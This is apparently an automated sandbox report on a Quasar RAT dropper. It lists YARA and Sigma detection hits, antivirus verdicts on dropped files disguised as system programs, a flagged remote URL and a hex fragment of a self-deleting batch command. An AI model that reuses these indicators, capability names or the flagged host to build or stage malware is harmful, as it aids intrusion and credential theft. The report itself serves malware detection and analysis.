10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
7.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
7.0.CVbJSUXraQ.exe.db0000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c9ac50.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c9ac50.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.2.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
1.2.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
1.2.CVbJSUXraQ.exe.db0000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.2.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.2.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
1.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
1.0.CVbJSUXraQ.exe.db0000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Click to see the 458 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Avira: detection malicious, Label: TR/Spy.Agent.zgvfh
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Avira: detection malicious, Label: TR/AutoIt.tyemd
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Avira: detection malicious, Label: TR/Hijacker.W

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Multi AV Scanner detection for submitted file

Show sources

Source: CVbJSUXraQ.exe	Virustotal: Detection: 73%	Perma Link
Source: CVbJSUXraQ.exe	Metadefender: Detection: 68%	Perma Link
Source: CVbJSUXraQ.exe	ReversingLabs: Detection: 86%

Antivirus / Scanner detection for submitted sample

Show sources

Source: CVbJSUXraQ.exe	Avira: detected
Source: CVbJSUXraQ.exe	Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: http://0x21.in:8000/_az/

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Virustotal: Detection: 83%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Virustotal: Detection: 85%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\windef.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	ReversingLabs: Detection: 93%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Joe Sandbox ML: detected

Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.0.vnc.exe.ab0000.0.unpack	Avira: Label: TR/Hijacker.Gen
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack	Avira: Label: TR/Hijacker.W
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.2.vnc.exe.ab0000.0.unpack	Avira: Label: TR/Hijacker.Gen
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack	Avira: Label: TR/AD.MoksSteal.elw
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	Avira: Label: TR/AD.MoksSteal.elw

Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6A9BC CryptQueryObject,GetLastError,CryptMsgGetParam,CryptMsgGetParam,GetLastError,CertFindCertificateInStore,GetLastError,lstrcmpA,CryptDecodeObject,GetLastError,CryptDecodeObject,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,		5_2_00C6A9BC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040A610 CryptUnprotectData,LocalFree,		7_2_0040A610

Source: CVbJSUXraQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source:	Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: c:	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00E1445A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,	5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,	5_2_00C76554
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,	5_2_00C7FFA8
